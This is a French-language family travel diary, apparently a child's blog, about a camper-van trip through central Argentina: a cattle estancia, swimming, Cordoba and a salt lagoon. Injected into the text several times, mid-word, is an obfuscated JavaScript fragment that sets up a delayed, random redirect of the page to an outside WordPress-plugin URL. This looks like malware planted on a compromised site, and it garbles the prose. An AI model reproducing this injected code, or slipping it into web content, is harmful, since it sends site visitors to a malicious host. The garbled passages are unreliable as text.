On traverse le centre de l’Argentine !

by Alice

Jeudi 2 janvier

Samedi on a rencontré un Monsieur très gentil, il s’appelle Carlos et il est vétérinaire de vaches. Du coup il nous a fait faire un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour en 4×4. D’abord on est allé chercher du foin ensuite on l’a donné aux veaux de 4 à 6 mois. Il y a en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout 6000 vaches. Après on est allé voir un élevage de poissons, il y avait 400 000 poissons. Cette très grande ferme ça s’appelle une « estancia ». Il y en a beaucoup en Argentine. Il y a aussi beaucoup de collines de Yerba Maté.

Le lendemain  Carlos nous a encore invité pour faire un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour dans son 4×4 et aussi pour nous faire visiter les alentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tours. Après il nous a invité a un asado (barbecue). Il y avait une piscine et on on s’est baigné, l’eau était très chaude. Sa famille était là et était très gentille.

Dimanche nous sommes allé nous baigner dans un Rio dans un joli petit village : Yapeyu. L’eau était très chaude et il y avait beaucoup de courant.

Le 30 nous sommes allé à Santa Fé, on a fait les boutiques et le soir nous nous sommes rafraîchis dans une piscine. Ce qui était drôle c’est que chacun avait SA piscine ! Mais une petite fille est venue dans la notre.

Le 31 nous sommes allés à La Francia, Çà s’appelle comme ça car c’est un français qui a construit cette ville. On a fait un pique-nique dans la ville.

Aujourd’hui on est allé à Cordoba et on a fait les boutiques et après on est allé manger au restaurant. Nous sommes dans un camping et on s’est baigné dans une grande piscine.

Jeudi 9 janvier

Vendredi dernier nous sommes allés chez une famille de 2 jumeaux : Alma et Quentin. Ils ont 12 ans. Je me suis beaucoup amusée avec Alma. Un jour il  a plu et on a couru sous la pluie. Un autre jour on a fait des bracelets, en fils. Maintenant je sais faire et j’ai trois bracelets à mon poignet. Souvent quand on ne se comprend pas on regarde sur le téléphone le traducteur. On a aussi regardé un film d’horreur !!!! On s’est trop bien amusé.

Mardi nous sommes partis dans un camping au bord d’une lagune de sel, nous avons marché dessus et ça craque sous nos pieds. Avec Clément nous nous sommes aventurés dans du sable mouvant et nous nous sommes coincés jusqu’aux chevilles. Dans le camping il y avait une piscine.

Le lendemain nous avons roulé toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la journée, et vers 16h un gros camion nous a frôlés et le lanterneau de la capucine s’est envolé. Maintenant notre camping-car est aveugle !!! Pour le réparer nous sommes allés chez un menuisier et il nous l’a réparé. Le patron nous a invité chez lui. Il a une petite fille trop choupinette qui me colle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le temps. Il a un fils qui a beaucoup joué avec Clément.